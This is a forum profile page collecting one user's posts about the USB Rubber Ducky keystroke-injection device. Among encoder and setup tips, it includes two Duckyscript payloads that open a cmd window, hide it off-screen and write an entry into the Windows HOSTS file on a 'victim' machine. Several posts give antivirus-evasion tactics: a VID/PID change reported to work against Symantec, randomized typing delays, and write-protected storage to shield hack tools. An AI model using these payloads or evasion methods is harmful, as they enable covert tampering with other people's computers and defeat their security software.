Jump to content

overwraith

Dedicated Members
  • Posts

    742
  • Joined

  • Last visited

  • Days Won

    5

Posts posted by overwraith

  1. There is a problem I foresee you having though. The USB mass storage part does not show up for a while, so you may end up having to make a batch loop which waits for the USB mass storage to mount. The following code I made on the fly, so it probably wont work, but will show you more or less what to do to get this working.

    :while1
    
    for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d
    
    if Exist %myd% (
    
    goto break
    
    )
    
    goto while1
    
    :break
    
    REM Continue script. 
  2. Thanks for all the responses; they'll definitely guide me towards what I need =).

    The process itself wouldn't need to be uniform on all OS's; I'm mostly just looking

    for the easiest way to get the file on the computer and execute it.

    By chance, is it possible to have the .jar on the microSD card itself and have the

    ducky retreive it? I'm guessing no, but I thought I'd ask.

    You need to flash your duck with specialized firmware that midnightsnake has made. I think Twin Duck will work. It is now possible to have composite HID/Mass storage devices.

  3. As far as executing the jar file, there is probably no uniform way to navigate to each OS's command prompt that is the same for all of them. The number of scripts required to execute on different OS's can be minimized however by sticking to key sequences that are common to subsequent versions of the OS. For instance, one can probably make a script that works on Windows XP, and Vista, and Windows 7, but not Linux. Also, one can probably make one script that works on all or many flavors of Linux. I foresee 3 end scripts, one for Windows, one for Linux, and one for OS X. Twin duck can probably hold all the JRE files necessary. Portable apps may even have some form of portable JRE software. It may be worth it to look online for any kind of silent install procedure as well. I know that Python has a silent install.

  4. Never mind, I answered my own question. According to google, there is no female USB to bluetooth connector, because the connector would have to be able to convert the keyboard traffic into bluetooth traffic. It would be really cool though if the USB rubber ducky could be made to use bluetooth, for a more remote attack. Ex. wait for the victim to login, then press a button on the ducky to trigger the payload. I have no idea if it would work, and no Idea if there is any kind of setup procedure for bluetooth keyboards that would prevent this type of thing.

  5. I just tried the VID/PID change on the Semantec endpoint protection, and I can verify that the change does work. Are there any other ways the antivirus companies can block us, so we can get ahead of the curve in preventing the antivirus companies from blocking us?

    -If they take into account the speed at which we type the payloads, we can create bash scripts to randomize the delay values between commands or even letters. Could even modify the duck script language to do it automatically.

  6. Midnight snake showed me an improvement to the command line drive finding code;

    J:\>for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d
    
    J:\>echo %myd%
    J:

    This was part of what one of his firmware versions would automatically type in. So instead of using my for loop, we can use this loop which looks for a volume labeled "DUCKY". This means we don't need the text file on the root of the drive anymore.

  7. Is the jar file in the same directory as the directory you are running the command from? The file either has to be in the same directory that you are using it, or you need to put the full path before the encoder name.

    
    Try the following first:
    java -jar encoder /?
    
    I think this will fix your problem: 
    
    java -jar J:\folderName\encoder.jar -i inputFile -o outputFile

    A way to get around this is to put the encoder someplace like on your system drive's root, and add the encoder's file to the system path.

  8. The webpage (http://www.usbrubberducky.com) should be fixed eventually, as are most things on the internet.

    First watch the Quack Start video here:

    http://hakshop.myshopify.com/products/usb-rubber-ducky

    Then read through the Duck Script Syntax here:

    http://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript

    Then Read through a few payloads here (only execute them if you know what they're doing):

    http://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads

    Then search through the forums here, I'm sure there's something on getting started here somewhere.

    To compile a duckscript use the following command line syntax in the command line:

    java -jar encoder.jar -i E:\folder\inputFile.txt -o E:\inject.bin

    Someday you will want to learn about flashing, midnitesnake is the person to see about that. You can send him a message using the forum tools at the top of the screen.

    I'm sure other people will have good advice too...

  9. Yes but the delays be necessary on your victims system.

    
    

    REM Author:ashbreeze96 and overwraith

    CONTROL ESCAPE

    STRING cmd /Q /D /T:7F /F:OFF /V:ON /K

    DELAY 500

    ENTER

    DELAY 750

    ALT SPACE

    STRING M

    DOWNARROW

    REPEAT 100

    ENTER

    DELAY 50

    STRING ECHO. >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS

    DELAY 50

    ENTER

    DELAY 50

    STRING ECHO 10.0.0.1 ADMIN.COM >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS

    DELAY 50

    ENTER

    STRING exit

    ENTER

  10. What does CTRL+SHIFT+ENTER do?

    Additionally further down the forum at this link http://forums.hak5.org/index.php?/topic/28463-the-duck-and-the-rick-role/

    we made some additional modifications to a script that does essentially the same thing. Some of the noteworthy improvements include using GUI R instead of CONTROL ESC to allow this operate on non-vista/win7 devices. I think we also added a newline so we don't append to the end of the current line, and we also used a snippet that hides the command window below the bottom of the screen.

    REM Author:ashbreeze96 and overwraith
    GUI R
    STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
    DELAY 500
    ENTER
    DELAY 750
    ALT SPACE
    STRING M
    DOWNARROW
    REPEAT 100
    ENTER
    STRING ECHO. >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
    ENTER
    STRING ECHO 10.0.0.1 ADMIN.COM >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
    ENTER
    STRING exit
    ENTER

    The delays in the forum post at the designated forum had a lot of delays that aren't usually necessary on my system.

  11. Some software security flaws are generated by lazy coding practices though. Nearly all hacks prey on coding flaws. A buffer overflow (most prevalent in C and C++ languages) for instance is a case where a coder has neglected to check the length of a users input to the program. The data is written without checking whether or not it will overwrite things after the allocated buffer space, thus rewriting a return address after the buffer. If input is cleverly crafted, a buffer overflow situation can be used to run code that the programmer of the victim program didn't code. This is done by injecting shellcode into the buffer, and a return address which is written after the buffer to point back into the buffer, thus redirecting the flow of execution. I think java is probably written in C/C++ or something, as all our computer languages have a hierarchy of evolution. Machine code was first, then came Assembly, and then came compiled languages, which are sometimes used to write more complex compiled languages. Improper verification is also the cause of several more modern types of attacks including cross site scripting, SQL Injection, and XML injection. It can be difficult to catch all coding flaws before release, because of the sheer size of the source code. Programs can be hundreds to thousands of lines. Format String Exploits, also prevalent in C and C++ are also an error associated with incorrect input verification. Format String Exploits involve allowing the user to input '%' symbols into a printf format string.

  12. I had a good Idea a while ago, would it be possible to make a USB rubber ducky firmware variant that has mass storage support, but write protects the mass storage? This would be good if somebody wanted to insulate their hack tools from antivirus software. Perhaps if the executable files are discoverable by one antivirus brand, but not another, and you don't know which antivirus software you are facing in the field.

×
×
  • Create New...